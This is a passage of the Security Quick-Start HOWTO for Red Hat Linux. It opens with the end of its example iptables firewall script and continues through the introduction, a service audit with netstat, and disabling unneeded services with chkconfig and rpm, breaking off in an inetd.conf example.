$IPTABLES -A INPUT -i $WAN_IFACE -m unclean -m limit \
--limit 15/minute -j LOG --log-prefix "Unclean: "
$IPTABLES -A INPUT -i $WAN_IFACE -m unclean -j DROP
## LAN access and masquerading
#
# Allow connections from our own LAN's private IP addresses via the LAN
# interface and set up forwarding for masqueraders if we have a LAN_NET
# defined above.
if [ -n "$LAN_NET" ]; then
echo 1 > /proc/sys/net/ipv4/ip_forward
$IPTABLES -A INPUT -i $LAN_IFACE -j ACCEPT
# $IPTABLES -A INPUT -i $LAN_IFACE -s $LAN_NET -d $LAN_NET -j ACCEPT
$IPTABLES -t nat -A POSTROUTING -s $LAN_NET -o $WAN_IFACE -j MASQUERADE
fi
## Blacklist
#
# Get the blacklisted hosts/nets out of the way, before we start opening
# up any services. These will have no access to us at all, and will
# be logged.
for i in $BLACKLIST; do
$IPTABLES -A INPUT -s $i -m limit --limit 5/minute \
-j LOG --log-prefix "Blacklisted: "
$IPTABLES -A INPUT -s $i -j DROP
done
## Trusted hosts/nets
#
# This is our trusted host list. These have access to everything.
for i in $TRUSTED; do
$IPTABLES -A INPUT -s $i -j ACCEPT
done
# Port Forwarding
#
# Which ports get forwarded to which host. This is one to one
# port mapping (ie 80 -> 80) in this case.
[ -n "$FORWARD_HOST" ] &&\
for i in $FORWARD_PORTS; do
$IPTABLES -A FORWARD -p tcp -s $ANYWHERE -d $FORWARD_HOST \
--dport $i -j ACCEPT
$IPTABLES -t nat -A PREROUTING -p tcp -d $WAN_IP --dport $i \
-j DNAT --to $FORWARD_HOST:$i
done
## Open, but Restricted Access ports
#
# Allow DHCP server (their port 67) to client (to our port 68) UDP
# traffic from outside source.
[ -n "$DHCP_SERVER" ] &&\
$IPTABLES -A INPUT -p udp -s $DHCP_SERVER --sport 67 \
-d $ANYWHERE --dport 68 -j ACCEPT
# Allow 'identd' (to our TCP port 113) from mail server only.
[ -n "$MAIL_SERVER" ] &&\
$IPTABLES -A INPUT -p tcp -s $MAIL_SERVER -d $WAN_IP --dport 113 -j ACCEPT
# Open up Public server ports here (available to the world):
for i in $PUBLIC_PORTS; do
$IPTABLES -A INPUT -p tcp -s $ANYWHERE -d $WAN_IP --dport $i -j ACCEPT
done
# So I can check my home POP3 mailbox from work. Also, so I can ssh
# in to home system. Only allow connections from my workplace's
# various IPs. Everything else is blocked.
$IPTABLES -A INPUT -p tcp -s 255.10.9.8/29 -d $WAN_IP --dport 110 -j ACCEPT
## ICMP (ping)
#
# ICMP rules, allow the bare essential types of ICMP only. Ping
# request is blocked, ie we won't respond to someone else's pings,
# but can still ping out.
$IPTABLES -A INPUT -p icmp --icmp-type echo-reply \
-s $ANYWHERE -d $WAN_IP -j ACCEPT
$IPTABLES -A INPUT -p icmp --icmp-type destination-unreachable \
-s $ANYWHERE -d $WAN_IP -j ACCEPT
$IPTABLES -A INPUT -p icmp --icmp-type time-exceeded \
-s $ANYWHERE -d $WAN_IP -j ACCEPT
# Identd Reject
#
# Special rule to reject (with rst) any identd/auth/port 113
# connections. This will speed up some services that ask for this,
# but don't require it. Be careful, some servers may require this
# one (IRC for instance).
#$IPTABLES -A INPUT -p tcp --dport 113 -j REJECT --reject-with tcp-reset
###################################################################
# Build a custom chain here, and set the default to DROP. All
# other traffic not allowed by the rules above, ultimately will
# wind up here, where it is blocked and logged, unless it passes
# our stateful rules for ESTABLISHED and RELATED connections. Let
# connection tracking do most of the worrying! We add the logging
# ability here with the '-j LOG' target. Outgoing traffic is
# allowed as that is the default policy for the 'output' chain.
# There are no restrictions placed on that in this script.
# New chain...
$IPTABLES -N DEFAULT
# Use the 'state' module to allow only certain connections based
# on their 'state'.
$IPTABLES -A DEFAULT -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPTABLES -A DEFAULT -m state --state NEW -i ! $WAN_IFACE -j ACCEPT
# Enable logging for anything that gets this far.
$IPTABLES -A DEFAULT -j LOG -m limit --limit 30/minute --log-prefix "Dropping: "
# Now drop it, if it has gotten here.
$IPTABLES -A DEFAULT -j DROP
# This is the 'bottom line' so to speak. Everything winds up
# here, where we bounce it to our custom built 'DEFAULT' chain
# that we defined just above. This is for both the FORWARD and
# INPUT chains.
$IPTABLES -A FORWARD -j DEFAULT
$IPTABLES -A INPUT -j DEFAULT
echo "Iptables firewall is up `date`."
##-- eof iptables.sh
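Once a script like this has run, it is worth confirming what the kernel actually loaded. A quick sanity check (run as root; chain names and counters will of course vary with your configuration):

```shell
# List every rule in the filter table, with packet/byte counters and
# numeric addresses (-n avoids slow reverse DNS lookups).
iptables -L -n -v
# Check the nat table too, to confirm the MASQUERADE and DNAT rules took.
iptables -t nat -L -n -v
```

If a rule you expected is missing, the script probably exited early on an error; re-run it by hand and watch for error messages.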
-----------------------------------------------------------------------------
8.10.3. Summary
A quick rundown of some of the highlights...
We added some host based access control rules: "blacklisted", and "trusted".
We then showed several types of service and port based access rules. For
instance, we allowed some very restrictive access to bigcat's POP3 server so
we could connect only from our workplace. We allowed a very narrow rule for
the ISP's DHCP server. This rule only allows one port on one outside IP
address to connect to only one of our ports and only via the UDP protocol.
This is a very specific rule! We are being specific since there is no reason
to allow any other traffic to these ports or from these addresses. Remember
our goal is the minimum amount of traffic necessary for our particular
situation.
So we made those few exceptions mentioned above, and all other services
running on bigcat should be effectively blocked completely from outside
connections. These are still happily running on bigcat, but are now safe and
sound behind our packet filtering firewall. You probably have other services
that fall in this category as well.
We also have a small, home network in the above example. We did not take any
steps to block that traffic. So the LAN has access to all services running on
bigcat. And it is further "masqueraded", so that it has Internet access
(different HOWTO), by manipulating the "forward" chain. And the LAN is still
protected by our firewall since it sits behind the firewall. We also didn't
impose any restrictive rules on the traffic leaving bigcat. In some
situations, this might be a good idea.
Of course, this is just a hypothetical example. Your individual situation is
surely different, and would require some changes and likely some additions to
the rules above. For instance, if your ISP does not use DHCP (most do not),
then that rule would make no sense. PPP works differently and such rules are
not needed.
Please don't interpret the fact that we ran servers in this example to mean
that doing so is necessarily a "safe" thing to do. We shouldn't do it this
way unless a) we really need to, b) we are running the current, safe version,
and c) we are able to keep abreast of security related issues that might
affect these services. Vigilance and caution are part of our responsibilities
here too.
-----------------------------------------------------------------------------
8.10.4. iptables mini-me
Just to demonstrate how succinctly iptables can be configured in a minimalist
situation, the below is from the Netfilter team's Rusty's Really Quick Guide
To Packet Filtering:
"Most people just have a single PPP connection to the Internet, and don't
want anyone coming back into their network, or the firewall:"
## Insert connection-tracking modules (not needed if built into kernel).
insmod ip_conntrack
insmod ip_conntrack_ftp
## Create chain which blocks new connections, except if coming from inside.
iptables -N block
iptables -A block -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A block -m state --state NEW -i ! ppp0 -j ACCEPT
iptables -A block -j DROP
## Jump to that chain from INPUT and FORWARD chains.
iptables -A INPUT -j block
iptables -A FORWARD -j block
This simple script will allow all outbound connections that we initiate, i.e.
any NEW connections (since the default policy of ACCEPT is not changed). Then
any connections that are "ESTABLISHED" and "RELATED" to these are also
allowed. And, any connections that are not incoming from our WAN side
interface, ppp0, are also allowed. This would be lo or possibly a LAN
interface like eth1. So we can do whatever we want, but no unwanted, incoming
connection attempts are allowed from the Internet. None.
This script also demonstrates the creation of a custom chain, defined here as
"block", which is used both for the INPUT and FORWARD chains.
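One caveat worth repeating: rules loaded this way live only in the running kernel and are gone after a reboot. On Red Hat systems, one common approach (a sketch; the file location is the Red Hat convention and may differ on other distributions) is to dump the working ruleset where the iptables initscript can reload it at boot:

```shell
# Save the current ruleset to the file read by the Red Hat initscript.
iptables-save > /etc/sysconfig/iptables
# Reload it by hand at any time (this is essentially what
# 'service iptables start' does at boot).
iptables-restore < /etc/sysconfig/iptables
```

Alternatively, the firewall script itself can simply be invoked from a boot time script such as /etc/rc.d/rc.local.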
Security Quick-Start HOWTO for Red Hat Linux
Hal Burgiss
hal@foobox.net
v. 1.2, 2002-07-21
Revision History
Revision v. 1.2 2002-07-21 Revised by: hb
A few small additions, and fix the usual broken links.
Revision v. 1.1 2002-02-06 Revised by: hb
A few fixes, some additions and many touch-ups from the original.
Revision v. 1.0 2001-11-07 Revised by: hb
Initial Release.
This document is an overview of the basic steps required to secure a Linux
installation from intrusion. It is intended to be an introduction. This is a
Red Hat specific version of this document.
-----------------------------------------------------------------------------
Table of Contents
1. Introduction
1.1. Why me?
1.2. Notes
1.3. Copyright
1.4. Credits
1.5. Disclaimer
1.6. New Versions and Changelog
1.7. Feedback
2. Foreword
2.1. The Optimum Configuration
2.2. Before We Start
3. Step 1: Which services do we really need?
3.1. System Audit
3.2. The Danger Zone (or r00t m3 pl34s3)
3.3. Stopping Services
3.4. Exceptions
3.5. Summary and Conclusions for Step 1
4. Step 2: Updating
4.1. Summary and Conclusions for Step 2
5. Step 3: Firewalls and Setting Access Policies
5.1. Strategy
5.2. Packet Filters -- Ipchains and Iptables
5.3. Tcpwrappers (libwrap)
5.4. PortSentry
5.5. Proxies
5.6. Individual Applications
5.7. Verifying
5.8. Logging
5.9. Where to Start
5.10. Summary and Conclusions for Step 3
6. Intrusion Detection
6.1. Intrusion Detection Systems (IDS)
6.2. Have I Been Hacked?
6.3. Reclaiming a Compromised System
7. General Tips
8. Appendix
8.1. Servers, Ports, and Packets
8.2. Common Ports
8.3. Netstat Tutorial
8.4. Attacks and Threats
8.5. Links
8.6. Editing Text Files
8.7. nmap
8.8. Sysctl Options
8.9. Secure Alternatives
8.10. Ipchains and Iptables Redux
1. Introduction
1.1. Why me?
Who should be reading this document and why should the average Linux user
care about security? Those new to Linux, or unfamiliar with the inherent
security issues of connecting a Linux system to large networks like Internet
should be reading. "Security" is a broad subject with many facets, and is
covered in much more depth in other documents, books, and on various sites on
the Web. This document is intended to be an introduction to the most basic
concepts as they relate to Red Hat Linux, and as a starting point only.
Iptables Weekly Log Summary from Jul 15 04:24:13 to Jul 22 04:06:00
Blocked Connection Attempts:

Rejected tcp packets by destination port
port             count
111              19
53               12
21               9
515              9
27374            8
443              6
1080             2
1138             1

Rejected udp packets by destination port
port             count
137              34
22               1
The above is real, live data from a one week period for my home LAN. Much of
the above would seem to be specifically targeted at Linux systems. Many of
the targeted "destination" ports are used by well known Linux and Unix
services, and all may be installed, and possibly even running, on your
system.
The focus here will be on threats that are shared by all Linux users, whether
a dual boot home user, or large commercial site. And we will take a few,
relatively quick and easy steps that will make a typical home Desktop system
or small office system running Red Hat Linux reasonably safe from the
majority of outside threats. For those responsible for Linux systems in a
larger or more complex environment, you'd be well advised to read this, and
then follow up with additional reading suitable to your particular situation.
Actually, this is probably good advice for everybody.
We will assume the reader knows little about Linux, networking, TCP/IP, and
the finer points of running a server Operating System like Linux. We will
also assume, for the sake of this document, that all local users are
"trusted" users, and won't address physical or local network security issues
in any detail. Again, if this is not the case, further reading is strongly
recommended.
The principles that will guide us in our quest are:
  * There is no magic bullet. There is no one single thing we can do to make
    us secure. It is not that simple.
  * Security is a process that requires maintenance, not an objective to be
    reached.
  * There is no 100% safe program, package or distribution. Just varying
    degrees of insecurity.
The steps we will be taking to get there are:
  * Step 1: Turn off, and perhaps uninstall, any and all unnecessary
    services.
  * Step 2: Make sure that any services that are installed are updated and
    patched to the current, safe version -- and then stay that way. Every
    server application has potential exploits. Some have just not been found
    yet.
  * Step 3: Limit connections to us from outside sources by implementing a
    firewall and/or other restrictive policies. The goal is to allow only the
    minimum traffic necessary for whatever our individual situation may be.
  * Awareness. Know your system, and how to properly maintain and secure it.
    New vulnerabilities are found, and exploited, all the time. Today's
    secure system may have tomorrow's as yet unfound weaknesses.
If you don't have time to read everything, concentrate on Steps 1, 2, and 3.
This is where the meat of the subject matter is. The Appendix has a lot of
supporting information, which may be helpful, but may not be necessary for
all readers.
-----------------------------------------------------------------------------
1.2. Notes
This is a Red Hat specific version of this document. The included examples
are compatible with Red Hat 7.0 and later. Actually, most examples should
work with earlier versions of Red Hat as well. Also, this document should be
applicable to other distributions that are Red Hat derivatives, such as
Mandrake, Conectiva, etc.
Overwhelmingly, the content of this document is not peculiar to Red Hat. The
same rules and methodologies apply to other Linuxes. And indeed, to other
Operating Systems as well. But each may have their own way of doing things --
the file names and locations may differ, as may the system utilities that we
rely on. It is these differences that make this document a "Red Hat" version.
-----------------------------------------------------------------------------
1.3. Copyright
Security-Quickstart HOWTO for Red Hat Linux
Copyright © 2001 Hal Burgiss.
This document is free; you can redistribute it and/or modify it under the
terms of the GNU General Public License as published by the Free Software
Foundation; either version 2 of the License, or (at your option) any later
version.
This document is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You can get a copy of the GNU GPL at [http://www.gnu.org/copyleft/
gpl.html] http://www.gnu.org/copyleft/gpl.html.
-----------------------------------------------------------------------------
1.4. Credits
Many thanks to those who helped with the production of this document.
  * Bill Staehle, who has done a little bit of everything: ideas, editing,
    encouragement, and suggestions, many of which have been incorporated.
    Bill helped greatly with the content of this document.
  * Others who have contributed in one way or another: Dave Wreski, Ian
    Jones, Jacco de Leeuw, and Indulis Bernsteins.
  * Various posters on comp.os.linux.security, a great place to learn about
    Linux and security.
  * The Netfilter Development team for their work on iptables and connection
    tracking, state of the art tools with which to protect our systems.
-----------------------------------------------------------------------------
1.5. Disclaimer
The author accepts no liability for the contents of this document. Use the
concepts, examples and other content at your own risk. As this is a new
document, there may be errors and inaccuracies. Hopefully these are few and
far between. Corrections and suggestions are welcomed.
This document is intended to give the new user a starting point for securing
their system while it is connected to the Internet. Please understand that
there is no intention whatsoever of claiming that the contents of this
document will necessarily result in an ultimately secure and worry-free
computing environment. Security is a complex topic. This document just
addresses some of the most basic issues that inexperienced users should be
aware of.
The reader is encouraged to read other security related documentation and
articles. And to stay abreast of security issues as they evolve. Security is
not an objective, but an ongoing process.
-----------------------------------------------------------------------------
1.6. New Versions and Changelog
The current official version can always be found at [http://www.tldp.org/
HOWTO/Security-Quickstart-Redhat-HOWTO/] http://www.tldp.org/HOWTO/
Security-Quickstart-Redhat-HOWTO/. Pre-release versions can be found at
[http://feenix.burgiss.net/ldp/quickstart-rh/] http://feenix.burgiss.net/ldp/
quickstart-rh/.
Other formats, including PDF, PS, single page HTML, may be found at the Linux
Documentation HOWTO index page: [http://tldp.org/docs.html#howto] http://
tldp.org/docs.html#howto.
Changelog:
Version 1.2: Clarifications on example firewall scripts, and small additions
to 'Have I been Hacked'. Note on Zonealarm type applications. More on the use
of "chattr" by script kiddies, and how to check for this. Other small
additions and clarifications.
Version 1.1: Various corrections, amplifications and numerous mostly small
additions. Too many to list. Oh yea, learn to spell Red Hat correctly ;-)
Version 1.0: This is the initial release of this document. Comments welcomed.
-----------------------------------------------------------------------------
1.7. Feedback
Any and all comments on this document are most welcomed. Please make sure you
have the most current version before submitting corrections or suggestions!
These can be sent to <hal@foobox.net>.
-----------------------------------------------------------------------------
2. Foreword
Before getting into specifics, let's try to briefly answer some questions
about why we need to be concerned about security in the first place.
It is easy to see why an e-commerce site, an on-line bank, or a government
agency with sensitive documents would be concerned about security. But what
about the average user? Why should even a Linux home Desktop user worry about
security?
Anyone connected to the Internet is a target, plain and simple. It makes
little difference whether you have a part-time dialup connection, or a
full-time connection, though full-time connections make for bigger targets.
Larger sites make for bigger targets too, but this does not let small users
off the hook since the "small user" may be less skilled and thus an easier
victim. Red Hat, and Red Hat based distributions, tend to make for bigger
targets as well, since the installed user base is so large.
There are those out there that are scanning just for easy victims all the
time. If you start logging unwanted connection attempts, you will see this
soon enough. There is little doubt that many of these attempts are
maliciously motivated and the attacker, in some cases, is looking for Linux
boxes to crack. Does someone on the other side of the globe really want to
borrow my printer?
What do they want? Often, they just may want your computer, your IP address,
and your bandwidth. Then they use you to either attack others, or possibly
commit crimes or mischief and are hiding their true identity behind you. This
is an all too common scenario. Commercial and high-profile sites are targeted
more directly and have bigger worries, but we all face this type of common
threat.
With a few reasonable precautions, Red Hat Linux can be very secure, and with
all the available tools, makes for a fantastically fun and powerful Internet
connection or server. Most successful break-ins are the result of ignorance
or carelessness.
The bottom line is:
  * Do you want control of your own system or not?
  * Do you want to unwittingly participate in criminal activity?
  * Do you want to be used by someone else?
  * Do you want to risk losing your Internet connection?
  * Do you want to have to go through the time consuming steps of reclaiming
    your system?
  * Do you want to chance the loss of data on your system?
These are all real possibilities, unless we take the appropriate precautions.
Warning If you are reading this because you have already been broken into, or
suspect that you have, you cannot trust any of your system utilities
to provide reliable information. And the suggestions made in the next
several sections will not help you recover your system. Please jump
straight to the Have I been Hacked? section, and read that first.
-----------------------------------------------------------------------------
2.1. The Optimum Configuration
Ideally, we would want one computer as a dedicated firewall and router. This
would be a bare bones installation, with no servers running, and only the
required services and components installed. The rest of our systems would
connect via this dedicated router/firewall system. If we wanted publicly
accessible servers (web, mail, etc), these would be in a "DMZ"
(De-militarized Zone). The router/firewall allows connections from outside to
whatever services are running in the DMZ by "forwarding" these requests, but
it is segregated from the rest of the internal network (aka LAN) otherwise.
This leaves the rest of the internal network in fairly secure isolation, and
relative safety. The "danger zone" is confined to the DMZ.
But not everyone has the hardware to dedicate to this kind of installation.
This would require a minimum of two computers. Or three, if you would be
running any publicly available servers (not a good idea initially). Or maybe
you are just new to Linux, and don't know your way around well enough yet. So
if we can't do the ideal installation, we will do the next best thing.
-----------------------------------------------------------------------------
2.2. Before We Start
Before we get to the actual configuration sections, a couple of notes.
With Linux, there is always more than one way to perform any task. For the
purposes of our discussion, we will have to use as generic a set of tools as
we can. Unfortunately, GUI tools don't lend themselves to this type of
documentation. So we will be using text based, command line tools for the
most part. Red Hat does provide various GUI utilities; feel free to
substitute those in appropriate places.
The next several sections have been written such that you can perform the
recommended procedures as you read along. This is the "Quick Start" in the
document title!
To get ready, what you will need for the configuration sections below:
  * A text editor. There are many available. If you use a file manager
    application like gmc or nautilus, it probably has a built in editor. This
    will be fine. pico and mcedit are two relatively easy to use editors if
    you don't already have a favorite. There is a quick guide to Text editors
    in the Appendix that might help you get started. It is always a good idea
    to make a back up copy, before editing system configuration files.
  * For non-GUI editors and some of the commands, you will also need a
    terminal window opened. xterm, rxvt, and gnome-terminal all will work, as
    well as others.
We'll be using a hypothetical system here for examples with the hostname
"bigcat". Bigcat is a Linux desktop with a fresh install of the latest/
greatest Red Hat running. Bigcat has a full-time, direct Internet connection.
Even if your installation is not so "fresh", don't be deterred. Better late
than never.
-----------------------------------------------------------------------------
3. Step 1: Which services do we really need?
In this section we will see which services are running on our freshly
installed system, decide which we really need, and do away with the rest. If
you are not familiar with how servers and TCP connections work, you may want
to read the section on servers and ports in the Appendix first. If not
familiar with the netstat utility, you may want to read a quick overview of
it beforehand. There is also a section in the Appendix on ports, and
corresponding services. You may want to look that over too.
Our goal is to turn off as many services as possible. If we can turn them all
off, or at least off to outside connections, so much the better. Some rules
of thumb we will use to guide us:
  * It is perfectly possible to have a fully functional Internet connection
    with no servers running that are accessible to outside connections. Not
    only possible, but desirable in many cases. The principle here is that
    you will never be successfully broken into via a port that is not opened
    because no server is listening on it. No server == no port open == not
    vulnerable. At least to outside connections.
  * If you don't recognize a particular service, chances are good you don't
    really need it. We will assume that and so we'll turn it off. This may
    sound dangerous, but is a good rule of thumb to go by.
  * Some services are just not intended to be run over the Internet -- even
    if you decide it is something you really do need. We'll flag these as
    dangerous, and address these in later sections, should you decide you do
    really need them, and there is no good alternative.
-----------------------------------------------------------------------------
3.1. System Audit
So what is really running on our system anyway? Let's not take anything for
granted about what "should" be running, or what we "think" is running.
Which services get installed and started will vary greatly depending on which
version of Red Hat, and which installation options were chosen. Earlier
releases were very much prone to start many services and then let the user
figure out which ones were needed, and which ones weren't. Recent versions
are much more cautious. But this makes providing a ready made list of likely
services impossible. Not to worry, as we shouldn't trust what is supposed to
be running anyway. What we need to do is list for ourselves all running
services.
Now open an xterm, and su to root. You'll need to widen the window so that
the lines do not wrap. Use this command: netstat -tap |grep LISTEN. This will
give us a list of all currently running servers as indicated by the keyword
LISTEN, along with the "PID" and "Program Name" that started each particular
service.
+----------------------------------------------------------------------------------+
|# netstat -tap |grep LISTEN |
| *:exec *:* LISTEN 988/inetd |
| *:login *:* LISTEN 988/inetd |
| *:shell *:* LISTEN 988/inetd |
| *:printer *:* LISTEN 988/inetd |
| *:time *:* LISTEN 988/inetd |
| *:x11 *:* LISTEN 1462/X |
| *:http *:* LISTEN 1078/httpd |
| bigcat:domain *:* LISTEN 956/named |
| bigcat:domain *:* LISTEN 956/named |
| *:ssh *:* LISTEN 972/sshd |
| *:auth *:* LISTEN 388/in.identd |
| *:telnet *:* LISTEN 988/inetd |
| *:finger *:* LISTEN 988/inetd |
| *:sunrpc *:* LISTEN 1290/portmap |
| *:ftp *:* LISTEN 988/inetd |
| *:smtp *:* LISTEN 1738/sendmail: accepting connections |
| *:1694 *:* LISTEN 1319/rpc.mountd |
| *:netbios-ssn *:* LISTEN 422/smbd |
| |
| |
+----------------------------------------------------------------------------------+
Red Hat 7.x and Mandrake 8.x and later users will have xinetd in place of
inetd. Note the first three columns are cropped above for readability. If
your list is as long as the example, you have some work ahead of you! It is
highly unlikely that you really need anywhere near this number of servers
running.
Please be aware that the example above is just one of many, many possible
system configurations. Yours probably does look very different.
You don't understand what any of this is telling you? Hopefully then, you've
read the netstat tutorial in the Appendix, and understand how it works.
Understanding exactly what each server is in the above example, and what it
does, is beyond the scope of this document. You will have to check your
system's documentation (e.g. Installation Guide, man pages, etc) if that
service is important to you. For example, do "exec", "login", and "shell"
sound important? Yes, but these are not what they may sound like. They are
actually rexec, rlogin, and rsh, the "r" (for remote) commands. These are
antiquated, unnecessary, and in fact, are very dangerous if exposed to the
Internet.
Let's make a few quick assumptions about what is necessary and unnecessary,
and therefore what goes and what stays on bigcat. Since we are running a
desktop on bigcat, X11 of course needs to stay. If bigcat were a dedicated
server of some kind, then X11 would be unnecessary. If there is a printer
physically attached, the printer (lp) daemon should stay. Otherwise, it goes.
Print servers may sound harmless, but are potential targets too since they
can hold ports open. If we plan on logging in to bigcat from other hosts,
sshd (Secure SHell Daemon) would be necessary. If we have Microsoft hosts on
our LAN, we probably want Samba, so smbd should stay. Otherwise, it is
completely unnecessary. Everything else in this example is optional and not
required for a normally functioning system, and should probably go. See
anything that you don't recognize? Not sure about? It goes!
To sum up: since bigcat is a desktop with a printer attached, we will need
"x11", "printer". bigcat is on a LAN with MS hosts, and shares files and
printing with them, so "netbios-ssn" (smbd) is desired. We will also need
"ssh" so we can login from other machines. Everything else is unnecessary for
this particular case.
Nervous about this? If you want, you can make notes of any changes you make
or save the list of servers you got from netstat, with this command: netstat
-tap |grep LISTEN > ~/services.lst. That will save it to your home directory
with the name "services.lst" for future reference.
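The saved baseline makes later before/after comparisons trivial with diff. A sketch of the idea, using two scratch snapshots in /tmp to stand in for real netstat output taken at different times:

```shell
# Two listener snapshots; on a real system each would come from
# `netstat -tap | grep LISTEN` run before and after your changes.
printf '*:ssh LISTEN\n*:smtp LISTEN\n' > /tmp/services.lst
printf '*:ssh LISTEN\n*:smtp LISTEN\n*:telnet LISTEN\n' > /tmp/services.now

# diff flags anything that appeared or disappeared since the baseline
# (it exits non-zero when the lists differ, hence the || true).
diff /tmp/services.lst /tmp/services.now || true
```

Any "&gt;" line is a listener that has appeared since the baseline; a "&lt;" line is one that has gone away.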
This is not to say that the ones we have decided to keep are inherently safe.
Just that we probably need these. So we will have to deal with these via
firewalling or other means (addressed below).
It is worth noting that the telnet and ftp daemons in the above example are
servers, aka "listeners". These accept incoming connections to you. You do
not need, or want, these just to use ftp or telnet clients. For instance, you
can download files from an FTP site with just an ftp client. Running an ftp
server on your end is not required at all, and has serious security
implications.
There may be individual situations where it is desirable to make exceptions
to the conclusions reached above. See below.
-----------------------------------------------------------------------------
3.2. The Danger Zone (or r00t m3 pl34s3)
The following is a list of services that should not be run over the Internet.
Either disable these (see below), uninstall, or if you really do need these
services running locally, make sure they are the current, patched versions
and that they are effectively firewalled. And if you don't have a firewall in
place now, turn them off until it is up and verified to be working properly.
These are potentially insecure by their very nature, and as such are prime
cracker targets.
  * NFS (Network File System) and related services, including nfsd, lockd,
    mountd, statd, portmapper, etc. NFS is the standard Unix service for
    sharing file systems across a network. Great system for LAN usage, but
    dangerous over the Internet. And it's completely unnecessary on a
    stand-alone system.
  * rpc.* services, Remote Procedure Call.*, typically NFS and NIS related
    (see above).
  * Printer services (lpd).
  * The so-called r* (for "remote", i.e. Remote SHell) services: rsh, rlogin,
    rexec, rcp etc. Unnecessary, insecure and potentially dangerous, and
    better utilities are available if these capabilities are needed. ssh will
    do everything these commands do, and in a much more sane way. See the man
    pages for each if curious. These will probably show in netstat output
    without the "r": rlogin will be just "login", etc.
  * telnet server. There is no reason for this anymore. Use sshd instead.
  * ftp server. There are better, safer ways for most systems to exchange
    files, like scp or via http (see below). ftp is a proper protocol only
    for someone who is running a dedicated ftp server, and who has the time
    and skill to keep it buttoned down. For everyone else, it is potentially
    big trouble.
  * BIND (named), DNS server package. With some work, this can be done
    without great risk, but is not necessary in many situations, and requires
    special handling no matter how you do it. See the sections on Exceptions
    and special handling for individual applications.
  * Mail Transport Agent, aka "MTA" (sendmail, exim, postfix, qmail). Most
    installations on single computers will not really need this. If you are
    not going to be directly receiving mail from Internet hosts (as a
    designated MX box), but will rather use the POP server of your ISP, then
    it is not needed. You may however need this if you are receiving mail
    directly from other hosts on your LAN, but initially it's safer to
    disable this. Later, you can enable it over the local interface once your
    firewall and access policies have been implemented.
This is not necessarily a definitive list. Just some common services that are
sometimes started on default Red Hat installations. And conversely, this does
not imply that other services are inherently safe.
-----------------------------------------------------------------------------
3.3. Stopping Services
The next step is to find where each server on our kill list is being started.
If it is not obvious from the netstat output, use ps, find, grep or locate to
find more information from the "Program name" or "PID" info in the last
column. There are examples of this in the Process Owner section in the netstat
Tutorial of the Appendix. If the service name or port number does not look
familiar to you, you might get a brief explanation in your /etc/services
file.
chkconfig is a very useful command for controlling services that are started
via init scripts (see example below). Also, where xinetd is used, it can
control those services as well. chkconfig can tell us what services the
system is configured to run, but not necessarily all services that are
actually running, or what services may be started by other means, e.g. from
rc.local. It is a configuration tool, more than a real-time system auditing
tool.
Worried that we are going to break your system, and the pieces won't go
back together again? If so, take this approach: turn off everything listed
above in "The Danger Zone", and run your system for a while. OK? Try stopping
one of the ones we found to be "unnecessary" above. Then, run the system for
a while. Keep repeating this process, until you get to the bare minimum. If
this works, then make the changes permanent (see below).
The ultimate objective is not just to stop the service now, but to make sure
it is stopped permanently! So whatever steps you take here, be sure to check
after your next reboot.
There are various places and ways to start system services. Let's look at the
most common ways this is done, and is probably how your system works. System
services are typically either started by "init" scripts, or by inetd (or its
replacement xinetd) on most distributions.
-----------------------------------------------------------------------------
3.3.1. Stopping Init Services
Init services are typically started automatically during the boot process, or
during a runlevel change. There is a naming scheme that uses symlinks to
determine which services are to be started, or stopped, at any given
runlevel. The scripts themselves should be in /etc/init.d/ (or possibly /etc/
rc.d/init.d/ for older versions of Red Hat).
You can get a listing of these scripts:
+---------------------------------------------------------------------------+
| # ls -l /etc/rc.d/init.d/ | less |
| |
| |
+---------------------------------------------------------------------------+
To stop a running service now, as root:
+---------------------------------------------------------------------------+
| # /etc/init.d/<$SERVICE_NAME> stop |
| |
| |
+---------------------------------------------------------------------------+
Where "$SERVICE_NAME" is the name of the init script, which is often, but not
always, the same as the service name itself. Older Red Hat versions may use
the path /etc/rc.d/init.d/ instead.
This only stops this particular service now. It will restart again on the
next reboot, or runlevel change, unless additional steps are taken. So this
is really a two-step process for init-type services.
chkconfig can be used to see what services are started at each runlevel, and
to turn off any unneeded services. To view all services under its control,
type this command in an xterm:
+---------------------------------------------------------------------------+
| |
| # chkconfig --list | less |
| |
| |
+---------------------------------------------------------------------------+
To view only the ones that are "on":
+---------------------------------------------------------------------------+
| |
| # chkconfig --list | grep "\bon\b" | less |
| |
| |
+---------------------------------------------------------------------------+
The first column is the service name, and the remaining columns are the
various runlevels. We generally need only worry about runlevels 3 (boot to
text console login) and 5 (boot straight to X11 login). xinetd services won't
have columns, since that aspect is controlled by xinetd itself.
Examples of commands to turn services "off":
+---------------------------------------------------------------------------+
| |
| # chkconfig portmapper off |
| # chkconfig nfs off |
| # chkconfig telnet off |
| # chkconfig rlogin off |
| |
| |
+---------------------------------------------------------------------------+
Note that the last two are xinetd services. A very easy and nifty tool to
use! Red Hat also includes ntsysv and tksysv (GUI) for runlevel and service
configuration. See the man pages for additional command line options.
Another option here is to uninstall a package if you know you do not need it.
This is a pretty sure-fire, permanent fix. This also alleviates the potential
problem of keeping all installed packages updated and current (Step 2). RPM
makes it very easy to re-install a package should you change your mind.
To uninstall packages with RPM:
+---------------------------------------------------------------------------+
| # rpm -ev telnet-server rsh rsh-server |
| |
| |
+---------------------------------------------------------------------------+
The above command would uninstall the "telnet server" package (but not telnet
client!), "rsh" client and "rsh server" packages in one command. Red Hat also
includes gnorpm, a GUI RPM management utility which can do this as well.
-----------------------------------------------------------------------------
3.3.2. Inetd
Inetd is called a "super-daemon" because it is used to spawn sub-daemons.
inetd itself will generally be started via init scripts, and will "listen" on
the various ports as determined by which services are enabled in its
configuration file, /etc/inetd.conf. Any service listed here will be under
the control of inetd. Likewise, any of the listening servers in netstat
output that list "inetd" in the last column under "Program Name", will have
been started by inetd. You will have to adjust the inetd configuration to
stop these services. xinetd is an enhanced inetd replacement, and is
configured differently (see next section below).
Below is a partial snippet from a typical inetd.conf. Any service with a "#"
at the beginning of the line is "commented out", and thus ignored by inetd,
and consequently disabled.
+---------------------------------------------------------------------------+
|# |
|# inetd.conf This file describes the services that will be available |
|# through the INETD TCP/IP super server. To re-configure |
|# the running INETD process, edit this file, then send the |
|# INETD process a SIGHUP signal. |
|# |
